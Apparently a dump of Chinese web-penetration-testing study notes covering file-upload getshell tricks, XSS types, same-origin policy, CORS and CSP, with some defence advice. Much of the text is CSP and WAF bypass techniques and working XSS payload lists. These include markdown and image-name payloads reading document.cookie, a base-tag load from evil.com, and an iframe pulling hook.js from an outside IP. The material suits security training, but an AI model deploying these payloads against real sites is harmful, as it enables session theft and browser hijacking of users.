232 | 3.7.2. 攻击技巧
233 | 
234 | 3.7.2.1. Apache重写GetShell
235 | 
236 | Apache可根据是否允许重定向考虑上传.htaccess  
237 | 内容为  
238 | 
239 | AddType application/x-httpd-php .png php_flag engine 1 
240 | 
241 | 就可以用png或者其他后缀的文件做php脚本了
242 | 
243 | 3.7.2.2. 软链接任意读文件
244 | 
245 | 上传的压缩包文件会被解压的文件时，可以考虑上传含符号链接的文件 若服务器没有做好防护，可实现任意文件读取的效果
246 | 
247 | 3.7.3. 防护技巧
248 | 
249 | - 使用白名单限制上传文件的类型
250 | - 使用更严格的文件类型检查方式
251 | - 限制Web Server对上传文件夹的解析
252 | 


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（六）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（六）
  2 | 
  3 | **3.2.1. 分类**
  4 | 
  5 | XSS全称为Cross Site Scripting，为了和CSS分开简写为XSS，中文名为跨站脚本。该漏洞发生在用户端，是指在渲染过程中发生了不在预期过程中的JavaScript代码执行。XSS通常被用于获取Cookie、以受攻击者的身份进行操作等行为。
  6 | 
  7 | 3.2.1.1. 反射型XSS
  8 | 
  9 | 反射型XSS是比较常见和广泛的一类，举例来说，当一个网站的代码中包含类似下面的语句：```
 10 | <?php echo "<p>hello, $_GET['user']</p>";?> ，
 11 | ```那么在访问时设置 ```
 12 | /?user=</p><script>alert("hack")</script><p> ，
 13 | ```则可执行预设好的JavaScript代码。  反射型XSS通常出现在搜索等功能中，需要被攻击者点击对应的链接才能触发，且受到XSS Auditor、NoScript等防御手段的影响较大。
 14 | 
 15 | 3.2.1.2. 储存型XSS
 16 | 储存型XSS相比反射型来说危害较大，在这种漏洞中，攻击者能够把攻击载荷存入服务器的数据库中，造成持久化的攻击。
 17 | 
 18 | 3.2.1.3. DOM XSS
 19 | DOM型XSS不同之处在于DOM型XSS一般和服务器的解析响应没有直接关系，而是在JavaScript脚本动态执行的过程中产生的。  
 20 | 例如  
 21 | ```
 22 | <html> 
 23 | <head> 
 24 | <title>DOM Based XSS Demo</title> 
 25 | <script> 
 26 | function xsstest() 
 27 | {     
 28 |   var str = document.getElementById("input").value;     document.getElementById("output").innerHTML = "<img src='"+str+"'></img>"; 
 29 | } 
 30 | </script> 
 31 | </head> 
 32 | <body> 
 33 | <div id="output"></div> 
 34 | <input type="text" id="input" size=50 value="" /> 
 35 | <input type="button" value="submit" onclick="xsstest()" /> </body> 
 36 | </html>
 37 | 输入 x' onerror='javascript:alert(/xss/) 即可触发。
 38 | ```
 39 | 
 40 | 3.2.1.4. Blind XSS
 41 | Blind XSS是储存型XSS的一种，它保存在某些存储中，当一个“受害者”访问这个页面时执行，并且在文档对象模型（DOM）中呈现payload。它被归类为盲目的原因是因为它通常发生在通常不暴露给用户的功能上。
 42 | 
 43 | 
 44 | ------------
 45 | 
 46 | 3.2.2. 同源策略
 47 | 
 48 | 3.2.2.1. 简介
 49 | 
 50 | 同源策略限制了不同源之间如何进行资源交互，是用于隔离潜在恶意文件的重要安全机制。是否同源由URL决定，URL由协议、域名、端口和路径组成，如果两个URL的协议、域名和端口相同，则表示他们同源。
 51 | 
 52 | 3.2.2.1.1. file域的同源策略
 53 | 在之前的浏览器中，任意两个file域的URI被认为是同源的。本地磁盘上的任何HTML文件都可以读取本地磁盘上的任何其他文件。
 54 | 从Gecko 1.9开始，文件使用了更细致的同源策略，只有当源文件的父目录是目标文件的祖先目录时，文件才能读取另一个文件。
 55 | 
 56 | 3.2.2.1.2. cookie的同源策略
 57 | cookie使用不同的源定义方式，一个页面可以为本域和任何父域设置cookie，只要是父域不是公共后缀（public suffix）即可。  
 58 | 不管使用哪个协议（HTTP/HTTPS）或端口号，浏览器都允许给定的域以及其任何子域名访问cookie。设置 cookie时，可以使用 domain / path / secure 和 http-only 标记来限定其访问性。  
 59 | 所以 https://localhost:8080/ 和 http://localhost:8081/ 的Cookie是共享的。
 60 | 
 61 | 3.2.2.1.3. Flash/SilverLight跨域
 62 | 浏览器的各种插件也存在跨域需求。通常是通过在服务器配置crossdomain.xml，设置本服务允许哪些域名的跨域访问。  
 63 | 客户端会请求此文件，如果发现自己的域名在访问列表里，就发起真正的请求，否则不发送请求。
 64 | 
 65 | 
 66 | ------------
 67 | 
 68 | 3.2.2.2. 源的更改
 69 | 同源策略认为域和子域属于不同的域，例如 
 70 | child1.a.com 与 a.com / child1.a.com 与 child2.a.com/ xxx.child1.a.com 与 child1.a.com 两两不同源。  
 71 | 对于这种情况，可以在两个方面各自设置 document.damain='a.com' 来改变其源来实现以上任意两个页面之间的通信。  
 72 | 另外因为浏览器单独保存端口号，这种赋值会导致端口号被重写为 null 。
 73 | 
 74 | 3.2.2.3. 跨源访问
 75 | 同源策略控制了不同源之间的交互，这些交互通常分为三类：  
 76 | 通常允许跨域写操作（Cross-origin writes）
 77 | 链接（links）
 78 | 重定向
 79 | 表单提交
 80 | 通常允许跨域资源嵌入（Cross-origin embedding）
 81 | 通常不允许跨域读操作（Cross-origin reads）
 82 | 可能嵌入跨源的资源的一些示例有：  
 83 | ```
 84 | <script src="..."></script> 标签嵌入跨域脚本。语法错误信息只能在同源脚本中捕捉到。
 85 | <link rel="stylesheet" href="..."> 标签嵌入CSS。由于CSS的松散的语法规则，CSS的跨域需要一个设置正确的Content-Type 消息头。
 86 | <img> / <video> / <audio> 嵌入多媒体资源。
 87 | <object> <embed> 和 <applet> 的插件。
 88 | @font-face 引入的字体。一些浏览器允许跨域字体（ cross-origin fonts），一些需要同源字体（same-origin fonts）。
 89 | <frame> 和 <iframe> 载入的任何资源。站点可以使用X-Frame-Options消息头来阻止这种形式的跨域交互。
 90 | 
 91 | ```
 92 | 
 93 | 3.2.2.3.1. JSONP跨域
 94 | 
 95 | ```
 96 | JSONP就是利用 <script> 标签的跨域能力实现跨域数据的访问，请求动态生成的JavaScript脚本同时带一个callback函数名作为参数。  
 97 | ```
 98 | 
 99 | 服务端收到请求后，动态生成脚本产生数据，并在代码中以产生的数据为参数调用callback函数。
100 | 3.2.2.3.2. 跨源脚本API访问
101 | 
102 | Javascript的APIs中，如 iframe.contentWindow , window.parent, window.open 和 window.opener 允许文档间相互引用。当两个文档的源不同时，这些引用方式将对 window 和 location 对象的访问添加限制。
103 | window 允许跨源访问的方法有  
104 | window.blur
105 | window.close
106 | window.focus
107 | window.postMessage
108 | window 允许跨源访问的属性有 
109 | window.closed
110 | window.frames
111 | window.length
112 | window.location
113 | window.opener
114 | window.parent
115 | window.self
116 | window.top
117 | window.window
118 | 其中 window.location 允许读/写，其他的属性只允许读
119 | 
120 | 3.2.2.3.3. 跨源数据存储访问
121 | 存储在浏览器中的数据，如 localStorage 和 IndexedDB，以源进行分割。每个源都拥有自己单独的存储空间，一个源中的Javascript脚本不能对属于其它源的数据进行读写操作。
122 | 
123 | ------------
124 | 
125 | 3.2.2.4. CORS
126 | 
127 | CORS是一个W3C标准，全称是”跨域资源共享”（Cross-origin resource sharing）。通过这个标准，可以允许浏览器读取跨域的资源。
128 | 
129 | 3.2.2.4.1. 常见返回头
130 | ```
131 | - Access-Control-Allow-Origin
132 | ```
133 | 声明允许的源
134 | - Access-Control-Allow-Origin: <origin> | *
135 | 
136 | - Access-Control-Expose-Headers
137 | 声明允许暴露的头```
138 |  e.g. Access-Control-Expose-Headers: X-My-Custom-Header,X-Another-Custom-Header
139 | ```
140 | 
141 | - Access-Control-Max-Age
142 | 声明Cache时间
143 | ```
144 | Access-Control-Max-Age: <delta-seconds>
145 | ```
146 | - Access-Control-Allow-Credentials
147 | 声明是否允许在请求中带入
148 | ```
149 | Access-Control-Allow-Credentials: true
150 | ```
151 | - Access-Control-Allow-Methods
152 | 声明允许的访问方式
153 | ```
154 | Access-Control-Allow-Methods: <method>[, <method>]*
155 | ```
156 | - Access-Control-Allow-Headers
157 | 声明允许的头
158 | ```
159 | Access-Control-Allow-Headers: <field-name>[, <field-name>]*
160 | ```
161 | 
162 | 3.2.2.4.2. 常见请求头
163 | 
164 | - Origin
165 | 指定请求的源
166 | 
167 | 
168 |     Origin: <origin>
169 | 
170 | - Access-Control-Request-Method
171 | 声明请求使用的方法
172 | 
173 | 
174 |     Access-Control-Request-Method: <method>
175 | 
176 | - Access-Control-Request-Headers
177 | 声明请求使用的header
178 | 
179 | 
180 |     Access-Control-Request-Headers: <field-name>[, <field-name>]*
181 | 
182 | 3.2.2.4.3. 防御建议
183 | - 如非必要不开启CORS
184 | - 定义详细的白名单，不使用通配符，仅配置所需要的头
185 | - 配置 Vary: Origin 头部
186 | - 如非必要不使用 Access-Control-Allow-Credentials
187 | - 限制缓存的时间
188 | 
189 | 
190 | ------------
191 | 
192 | 3.2.2.5. 阻止跨源访问
193 | 
194 | 阻止跨域写操作，可以检测请求中的 CSRF token ，这个标记被称为Cross-Site Request Forgery (CSRF) 标记。  
195 | 
196 | 阻止资源的跨站读取，因为嵌入资源通常会暴露信息，需要保证资源是不可嵌入的。但是多数情况下浏览器都不会遵守 Content-Type 消息头。例如如果在HTML文档中指定 <script> 标记，则浏览器会尝试将HTML解析为JavaScript。
197 | 
198 | 
199 | ------------
200 | 
201 | 3.2.3. CSP
202 | 
203 | 3.2.3.1. CSP是什么？
204 | Content Security Policy，简称 CSP。顾名思义，这个规范与内容安全有关，主要是用来定义页面可以加载哪些资源，减少 XSS 的发生。
205 | 
206 | 3.2.3.2. 配置
207 | 
208 | CSP策略可以通过 HTTP 头信息或者 meta 元素定义。  
209 | 
210 | CSP 有三类：  
211 | Content-Security-Policy (Google Chrome)
212 | X-Content-Security-Policy (Firefox)
213 | X-WebKit-CSP (WebKit-based browsers, e.g. Safari)
214 | HTTP header : 
215 | "Content-Security-Policy:" 策略 
216 | "Content-Security-Policy-Report-Only:" 策略 
217 | 
218 | HTTP Content-Security-Policy 头可以指定一个或多个资源是安全的，而Content-Security-Policy-Report-Only则是允许服务器检查（非强制）一个策略。多个头的策略定义由优先采用最先定义的。
219 | 
220 | HTML Meta :  
221 | ```
222 | <meta http-equiv="content-security-policy" content="策略"> 
223 | <meta http-equiv="content-security-policy-report-only" content="策略">
224 | ```
225 | 
226 | 3.2.3.2.1. 指令说明
227 | ![s](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCEaef961e3ae32a03b088fe51844de0466/8787 "s")
228 | 
229 | 3.2.3.2.2. 关键字
230 | - -
231 | 允许从任意url加载，除了 data: blob: filesystem: schemes
232 | e.g. img-src -
233 | - none
234 | 禁止从任何url加载资源
235 | e.g. object-src 'none'
236 | - self
237 | 只可以加载同源资源
238 | e.g. img-src 'self'
239 | - data:
240 | 可以通过data协议加载资源
241 | e.g. img-src 'self' data:
242 | - domain.example.com
243 | e.g. img-src domain.example.com
244 | 只可以从特定的域加载资源
245 | - \*.example.com
246 | e.g. img-src \*.example.com
247 | 可以从任意example.com的子域处加载资源
248 | - https://cdn.com
249 | e.g. img-src https://cdn.com
250 | 只能从给定的域用https加载资源
251 | - https:
252 | e.g. img-src https:
253 | 只能从任意域用https加载资源
254 | - unsafe-inline
255 | 允许内部资源执行代码例如style attribute,onclick或者是sicript标签
256 | e.g. script-src 'unsafe-inline'
257 | - unsafe-eval
258 | 允许一些不安全的代码执行方式，例如js的eval()
259 | e.g. script-src 'unsafe-eval'
260 | 
261 | 
262 | 
263 |     - nonce-<base64-value>'
264 | 使用随机的nonce，允许加载标签上nonce属性匹配的标签
265 | e.g. script-src 'nonce-bm9uY2U='
266 |     
267 | 
268 |     <hash-algo>-<base64-value>'
269 | 允许hash值匹配的代码块被执行
270 | e.g. script-src 'sha256-<base64-value>'
271 | 
272 | 3.2.3.2.3. 配置范例
273 | 允许执行内联 JS 代码，但不允许加载外部资源  
274 | Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline';
275 | 
276 | ------------
277 | 
278 | ```
279 | 3.2.3.3. Bypass
280 | 3.2.3.3.1. 预加载
281 | 浏览器为了增强用户体验，让浏览器更有效率，就有一个预加载的功能，大体是利用浏览器空闲时间去加载指定的内容，然后缓存起来。这个技术又细分为DNS-prefetch、subresource、prefetch、preconnect、prerender。  
282 | HTML5页面预加载是用link标签的rel属性来指定的。如果csp头有unsafe-inline，则用预加载的方式可以向外界发出请求，例如
283 | <!-- 预加载某个页面 --> 
284 | <link rel='prefetch' href='http://xxxx'><!-- firefox --> 
285 | <link rel='prerender' href='http://xxxx'><!-- chrome --> 
286 | <!-- 预加载某个图片 --> 
287 | <link rel='prefetch' href='http://xxxx/x.jpg'> 
288 | <!-- DNS 预解析 --> 
289 | <link rel="dns-prefetch" href="http://xxxx"> 
290 | <!-- 特定文件类型预加载 --> 
291 | <link rel='preload' href='//xxxxx/xx.js'><!-- chrome -->
292 | ```
293 | 
294 | 另外，不是所有的页面都能够被预加载，当资源类型如下时，讲阻止预加载操作：
295 | - URL中包含下载资源
296 | - 页面中包含音频、视频
297 | - POST、PUT和DELET操作的ajax请求
298 | - HTTP认证
299 | - HTTPS页面
300 | - 含恶意软件的页面
301 | - 弹窗页面
302 | - 占用资源很多的页面
303 | - 打开了chrome developer tools开发工具
304 | 
305 | 3.2.3.3.2. MIME Sniff
306 | 
307 | 举例来说，csp禁止跨站读取脚本，但是可以跨站读img，那么传一个含有脚本的img，再
308 | 
309 |     “<script href=’http://xxx.com/xx.jpg’>“，这里csp认为是一个img，绕过了检查，如果网站没有回正确的mime type，浏览器会进行猜测，就可能加载该img作为脚本
310 | 
311 | 
312 | 3.2.3.3.3. 302跳转
313 | 对于302跳转绕过CSP而言，实际上有以下几点限制：  
314 | - 跳板必须在允许的域内。
315 | - 要加载的文件的host部分必须跟允许的域的host部分一致
316 | 
317 | 3.2.3.3.4. iframe
318 | 
319 | 当可以执行代码时，可以创建一个源为 css js 等静态文件的frame，在配置不当时，该frame并不存在csp，则在该frame下再次创建frame，达到bypass的目的。同理，使用 ../../../ /%2e%2e%2f等可能触发服务器报错的链接也可以到达相应的目的。
320 | 
321 | 3.2.3.3.5. 其他
322 | ```
323 | CND Bypass,如果网站信任了某个CDN, 那么可利用相应的CDN bypass 
324 | Angular versions <1.5.9 >=1.5.0，存在漏洞 Git Pull Request 
325 | jQuery sourcemap
326 | document.write(`<script> //@        sourceMappingURL=http://xxxx/`+document.cookie+`<\/script>`);``
327 | a标签的ping属性
328 | For FireFox <META HTTP-EQUIV="refresh" CONTENT="0; url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnSWhhdmVZb3VOb3cnKTs8L3NjcmlwdD4=">
329 | <link rel="import" />
330 | <meta http-equiv="refresh" content="0; url=http://...." />
331 | 当script-src为nonce或无限制，且base-uri无限制时，可通过 base 标签修改根URL来bypass，如下加载了http://evil.com/main.js
332 | <base href="http://evil.com/">
333 | <script nonce="correct value" src="/main.js"></script>
334 | ```
335 | 
336 | 
337 | ------------
338 | 
339 | 3.2.4. XSS数据源
340 | 3.2.4.1. URL
341 | - location
342 | - location.href
343 | - location.pathname
344 | - location.search
345 | - location.hash
346 | - document.URL
347 | - document.documentURI
348 | - document.baseURI
349 | 
350 | 
351 | ------------
352 | 
353 | 3.2.4.2. Navigation
354 | 
355 | window.name
356 | document.referrer
357 | 
358 | 
359 | ------------
360 | 
361 | 3.2.4.3. Communication
362 | - Ajax
363 | - Fetch
364 | - WebSocket
365 | - PostMessage
366 | 
367 | 
368 | ------------
369 | 
370 | 3.2.4.4. Storage
371 | 
372 | Cookie
373 | LocalStorage
374 | SessionStorage
375 | 
376 | 
377 | ------------
378 | 3.2.5. Sink
379 | 3.2.5.1. 执行Js
380 | eval(payload)
381 | setTimeout(payload, 100)
382 | setInterval(payload, 100)
383 | Function(payload)()
384 | ```
385 | <script>payload</script>
386 | <img src=x onerror=payload>
387 | ```
388 | 
389 | 
390 | ------------
391 | 
392 | 3.2.5.2. 加载URL
393 | 
394 | location=javascript:alert(/xss/)
395 | location.href=javascript:alert(/xss/)
396 | location.assign(javascript:alert(/xss/))
397 | location.replace(javascript:alert(/xss/))
398 | 
399 | ------------
400 | 
401 | 3.2.5.3. 执行HTML
402 | 
403 | xx.innerHTML=payload
404 | xx.outerHTML=payload
405 | document.write(payload)
406 | document.writeln(payload)
407 | 
408 | 
409 | ------------
410 | 
411 | 3.2.6. XSS保护
412 | 
413 | 3.2.6.1. HTML过滤
414 | 使用一些白名单或者黑名单来过滤用户输入的HTML，以实现过滤的效果。例如DOMPurify等工具都是用该方式实现了XSS的保护。
415 | 
416 | 
417 | ------------
418 | 
419 | 3.2.6.2. X-Frame
420 | 
421 | X-Frame-Options 响应头有三个可选的值：  
422 | DENY
423 | 页面不能被嵌入到任何iframe或frame中
424 | SAMEORIGIN
425 | 页面只能被本站页面嵌入到iframe或者frame中
426 | ALLOW-FROM
427 | 页面允许frame或frame加载
428 | 
429 | 
430 | ------------
431 | 
432 | 3.2.6.3. XSS保护头
433 | 
434 | 基于 Webkit 内核的浏览器（比如Chrome）有一个名为XSS auditor的防护机制，如果浏览器检测到了含有恶意代码的输入被呈现在HTML文档中，那么这段呈现的恶意代码要么被删除，要么被转义，恶意代码不会被正常的渲染出来。  
435 | 而浏览器是否要拦截这段恶意代码取决于浏览器的XSS防护设置。  
436 | 要设置浏览器的防护机制，则可使用X-XSS-Protection字段 该字段有三个可选的值
437 | 
438 | 0: 表示关闭浏览器的XSS防护机制  
439 | 1: 删除检测到的恶意代码， 如果响应报文中没有看到X-XSS-Protection 字段，那么浏览器就认为X-XSS-Protection配置为1，这是浏览器的默认设置  
440 | 1; mode=block: 如果检测到恶意代码，在不渲染恶意代码
441 | 
442 | FireFox没有相关的保护机制，如果需要保护，可使用NoScript等相关插件。
443 | 
444 | 
445 | ------------
446 | 3.2.7. WAF Bypass
447 | 
448 | - 利用<>标记
449 | - 利用html属性
450 | href
451 | lowsrc
452 | bgsound
453 | background
454 | value
455 | action
456 | dynsrc
457 | - 关键字
458 | 利用回车拆分
459 | 字符串拼接（window["al" + "ert"]）
460 | - 利用编码绕过
461 | base64
462 | jsfuck
463 | String.fromCharCode
464 | HTML
465 | URL
466 | hex（window["\x61\x6c\x65\x72\x74"]）
467 | unicode
468 | utf7（+ADw-script+AD4-alert('XSS')+ADsAPA-/script+AD4-）
469 | utf16
470 | - 大小写混淆
471 | - 对标签属性值转码
472 | - 产生事件
473 | - css跨站解析
474 | - 长度限制bypass
475 | eval(name)
476 | eval(hash)
477 | import
478 | $.getScript
479 | $.get
480 | - .
481 | 使用 。绕过IP/域名
482 | document['cookie'] 绕过属性取值
483 | - 过滤引号用 “ ` “ 绕过
484 | 
485 | 
486 | ------------
487 | 
488 | 3.2.8.1. CSS 注入
489 | CSS注入最早开始于利用CSS中的 expression() url() regex() 等函数或特性来引入外部的恶意代码，但是随着浏览器的发展，这种方式被逐渐禁用，与此同时，出现了一些新的攻击方式。
490 | 
491 | 
492 | ------------
493 | 3.2.8.1.2. CSS selectors
494 | ![s](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCEaef961e3ae32a03b088fe51844de0466/8787 "s")
495 | 
496 | 
497 | ------------
498 | 
499 | 3.2.8.1.3. Abusing Unicode Range
500 | 当可以插入CSS的时候，可以使用 font-face 配合 unicode-range 获取目标网页对应字符集。PoC如下
501 | 
502 | ![s](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCE9d188475481b386de2917b5a7472d58b/8798 "s")
503 | 
504 | 
505 | ------------
506 | 3.2.8.2. Bypass Via Script Gadgets
507 | 
508 | 3.2.8.2.1. 简介
509 | 一些网站会使用白名单或者一些基于DOM的防御方式，对这些方式，有一种被称为 Code Reuse 的攻击方式可以绕过。该方式和二进制攻防中的Gadget相似，使用目标中的合法代码来达到绕过防御措施的目的。在论文 Code-Reuse Attacks for the Web: Breaking Cross-Site Scripting Mitigations via Script Gadgets 中有该方法的具体描述。  
510 | portswigger的一篇博文也表达了类似的想法 https://portswigger.net/blog/abusing-javascript-frameworks-to-bypass-xss-mitigations。  
511 | 下面有一个简单的例子，这个例子使用了 DOMPurify 来加固，但是因为引入了 jquery.mobile.js 导致可以被攻击。
512 | 
513 | 
514 | ------------
515 | 3.2.8.2.2. 例子
516 | ```
517 | // index.php 
518 | <?php  
519 | 
520 | $msg = $_GET['message']; 
521 | $msg = str_replace("\n", "", 
522 | $msg); $msg = base64_encode($msg);  
523 | 
524 | ?>  
525 | <!DOCTYPE html> 
526 | <html lang="en"> 
527 | <head>     
528 | <meta charset="UTF-8">     
529 | <title>Preview</title>     
530 | <script type="text/javascript" src="purify.js"></script>     
531 | <script type="text/javascript" src="jquery.js"></script>     
532 | <script type="text/javascript" src="jquery.mobile.js"></script> 
533 | </head> 
534 | <body>      
535 | 
536 | <script type="text/javascript">     
537 | var d= atob('<?php echo $msg; ?>');     
538 | var cleanvar = DOMPurify.sanitize(d);    
539 | document.write(cleanvar);     
540 | </script>  
541 | 
542 | </body> 
543 | </html> 
544 | 
545 | // playload 
546 | <div data-role=popup id='--> 
547 | &lt;script&gt;alert(1)&lt;/script&gt;'> 
548 | </div>
549 | 
550 | ```
551 | 
552 | ------------
553 | 
554 | 
555 | 3.2.8.3. jsfuck cheat sheet
556 | 
557 | 3.2.8.3.1. Basic values
558 | 
559 | - undefined > [][[]]
560 | - false > ![]
561 | - true > !![]
562 | - NaN > +[![]]
563 | - 0 > +[]
564 | - 1 > +!+[]
565 | - 2 > !+[]+!+[]
566 | 
567 | 
568 | ------------
569 | 
570 | 3.2.8.3.2. Basic strings
571 | 
572 | '' > []+[]
573 | 'undefined' > []+[][[]]
574 | 'false' > []+![]
575 | 'true' > []+!![]
576 | 'NaN' > []+(+[![]])
577 | '0' > []+(+[])
578 | '1' > []+(+!+[])
579 | '2' > []+(!+[]+!+[])
580 | '10' > [+!+[]]+[+[]]
581 | '11' > [+!+[]]+[+!+[]]
582 | '100' > [+!+[]]+[+[]]+(+[])
583 | 
584 | ------------
585 | 
586 | 3.2.8.3.3. Higher numbers
587 | 
588 | 10 > +([+!+[]]+[+[]])
589 | 11 > +([+!+[]]+[+!+[]])
590 | 100 > +([+!+[]]+[+[]]+(+[]))
591 | 
592 | ------------
593 | 
594 | 3.2.8.3.4. String alphabet
595 | 'a' > ([]+![])[+!+[]]
596 | 'd' > ([]+[][[]])[+!+[]+!+[]]
597 | 'e' > ([]+!+[])[+!+[]+!+[]+!+[]]
598 | 'f' > ([]+![])[+[]]
599 | 'i' > ([]+[][[]])[+!+[]+!+[]+!+[]+!+[]+!+[]]
600 | 'l' > ([]+![])[+!+[]+!+[]]
601 | 'n' > ([]+[][[]])[+!+[]]
602 | 'r' > ([]+!+[])[+!+[]]
603 | 's' > ([]+![])[+!+[]+!+[]+!+[]]
604 | 't' > ([]+!+[])[+[]]
605 | 'u' > ([]+!+[])[+!+[]+!+[]]
606 | 
607 | 
608 | ------------
609 | 
610 | 3.2.8.4. RPO(Relative Path Overwrite)
611 | RPO(Relative Path Overwrite) 攻击又称为相对路径覆盖攻击，依赖于浏览器和网络服务器的反应，利用服务器的 Web 缓存技术和配置差异。
612 | 
613 | ------------
614 | 
615 | 3.2.9. Payload
616 | 3.2.9.1. 常用
617 | ```
618 | <script>alert(/xss/)</script>
619 | <svg onload=alert(document.domain)>
620 | <img src=document.domain onerror=alert(document.domain)>
621 | <M onmouseover=alert(document.domain)>M
622 | <marquee onscroll=alert(document.domain)>
623 | <a href=javascript:alert(document.domain)>M</a>
624 | <body onload=alert(document.domain)>
625 | <details open ontoggle=alert(document.domain)>
626 | <embed src=javascript:alert(document.domain)>
627 | ```
628 | 
629 | 
630 | ------------
631 | 
632 | 3.2.9.2. 大小写绕过
633 | ```
634 | <script>alert(1)</script>
635 | <sCrIpT>alert(1)</sCrIpT>
636 | <ScRiPt>alert(1)</ScRiPt>
637 | <sCrIpT>alert(1)</ScRiPt>
638 | <ScRiPt>alert(1)</sCrIpT>
639 | <img src=1 onerror=alert(1)>
640 | <iMg src=1 oNeRrOr=alert(1)>
641 | <ImG src=1 OnErRoR=alert(1)>
642 | <img src=1 onerror="alert(&quot;M&quot;)">
643 | <marquee onscroll=alert(1)>
644 | <mArQuEe OnScRoLl=alert(1)>
645 | <MaRqUeE oNsCrOlL=alert(1)>
646 | ```
647 | 
648 | ------------
649 | 
650 | 3.2.9.3. 各种alert
651 | ```
652 | <script>alert(1)</script>
653 | <script>confirm(1)</script>
654 | <script>prompt(1)</script>
655 | <script>alert('1')</script>
656 | <script>alert("1")</script>
657 | <script>alert`1`</script>
658 | <script>(alert)(1)</script>
659 | <script>a=alert,a(1)</script>
660 | <script>[1].find(alert)</script>
661 | <script>top["al"+"ert"](1)</script>
662 | <script>top["a"+"l"+"e"+"r"+"t"](1)</script>
663 | <script>top[/al/.source+/ert/.source](1)</script>
664 | <script>top[/a/.source+/l/.source+/e/.source+/r/.source+/t/.source](1)</script>
665 | 
666 | ```
667 | 
668 | ------------
669 | 
670 | 3.2.9.4. 伪协议
671 | ```
672 | <a href=javascript:/0/,alert(%22M%22)>M</a>
673 | <a href=javascript:/00/,alert(%22M%22)>M</a>
674 | <a href=javascript:/000/,alert(%22M%22)>M</a>
675 | <a href=javascript:/M/,alert(%22M%22)>M</a>
676 | ```
677 | 
678 | ------------
679 | 
680 | 
681 | 3.2.9.5. Chrome XSS auditor bypass
682 | ```
683 | ?param=https://&param=@z.exeye.io/import%20rel=import%3E
684 | <base href=javascript:/M/><a href=,alert(1)>M</a>
685 | <base href=javascript:/M/><iframe src=,alert(1)></iframe>
686 | ```
687 | 
688 | ------------
689 | 
690 | 3.2.9.6. 长度限制
691 | ```
692 | <script>s+="l"</script> 
693 | \... 
694 | <script>eval(s)</script>
695 | ```
696 | 
697 | ------------
698 | 
699 | 
700 | 3.2.9.7. jquery sourceMappingURL
701 | 
702 | ```
703 | </textarea><script>var
704 | a=1//@ sourceMappingURL=//xss.site</script>
705 | ```
706 | 
707 | ------------
708 | 
709 | 3.2.9.8. 图片名
710 | ```
711 | "><img src=x onerror=alert(document.cookie)>.gif
712 | ```
713 | 
714 | ------------
715 | 
716 | 
717 | 3.2.9.9. 过期的payload
718 | src=javascript:alert基本不可以用 
719 | css expression特性只在旧版本ie可用
720 | 
721 | 
722 | ------------
723 | 
724 | 3.2.9.10. css
725 | ```
726 | <div style="background-image:url(javascript:alert(/xss/))"> 
727 | <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
728 | ```
729 | 
730 | ------------
731 | 
732 | 3.2.9.11. markdown
733 | ```
734 | ```
735 | [a](javascript:prompt(document.cookie)) 
736 | [a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie)) <&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> 
737 | ![a'"`onerror=prompt(document.cookie)](x) 
738 | [notmalicious](javascript:window.onerror=alert;throw%20document.cookie) 
739 | [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=) 
740 | ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)
741 | 
742 | ```
743 | 
744 | ------------
745 | 
746 | ```
747 | 3.2.9.12. iframe
748 | <iframe onload='     
749 | var sc   = document.createElement("scr" + "ipt");     
750 | sc.type  = "text/javascr" + "ipt";     
751 | sc.src   = "http://1.2.3.4/js/hook.js";    document.body.appendChild(sc);     
752 | ' 
753 | />
754 | <iframe src=javascript:alert(1)></iframe>
755 | <iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe>
756 | <iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>
757 | <iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;></iframe>
758 | <iframe src=https://baidu.com width=1366 height=768></iframe>
759 | <iframe src=javascript:alert(1) width=1366 height=768></iframe
760 | 
761 | ```
762 | ```
763 | 3.2.9.13. form
764 | <form action=javascript:alert(1)><input type=submit>
765 | <form><button formaction=javascript:alert(1)>M
766 | <form><input formaction=javascript:alert(1) type=submit value=M>
767 | <form><input formaction=javascript:alert(1) type=image value=M>
768 | <form><input formaction=javascript:alert(1) type=image src=1>
769 | ```
770 | 
771 | 
772 | ------------
773 | 
774 | ```
775 | 3.2.9.14. meta
776 | <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
777 | 
778 | 
779 | ------------
780 | 
781 | 3.2.10. 持久化
782 | 3.2.10.1. 基于存储
783 | 有时候网站会将信息存储在Cookie或localStorage，而因为这些数据一般是网站主动存储的，很多时候没有对Cookie或localStorage中取出的数据做过滤，会直接将其取出并展示在页面中，甚至存了JSON格式的数据时，部分站点存在 eval(data) 之类的调用。因此当有一个XSS时，可以把payload写入其中，在对应条件下触发。  
784 | 在一些条件下，这种利用方式可能因为一些特殊字符造成问题，可以使用 String.fromCharCode 来绕过。
785 | ```
786 | 
787 | 
788 | ------------
789 | 
790 | 3.2.10.2. Service Worker
791 | Service Worker可以拦截http请求，起到类似本地代理的作用，故可以使用Service Worker Hook一些请求，在请求中返回攻击代码，以实现持久化攻击的目的。  
792 | 在Chrome中，可通过 chrome://inspect/#service-workers 来查看Service Worker的状态，并进行停止。
793 | 
794 | ------------
795 | 
796 | 3.2.10.3. AppCache
797 | 在可控的网络环境下（公共wifi），可以使用AppCache机制，来强制存储一些Payload，未清除的情况下，用户访问站点时对应的payload会一直存在。


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（十一）.md:
--------------------------------------------------------------------------------
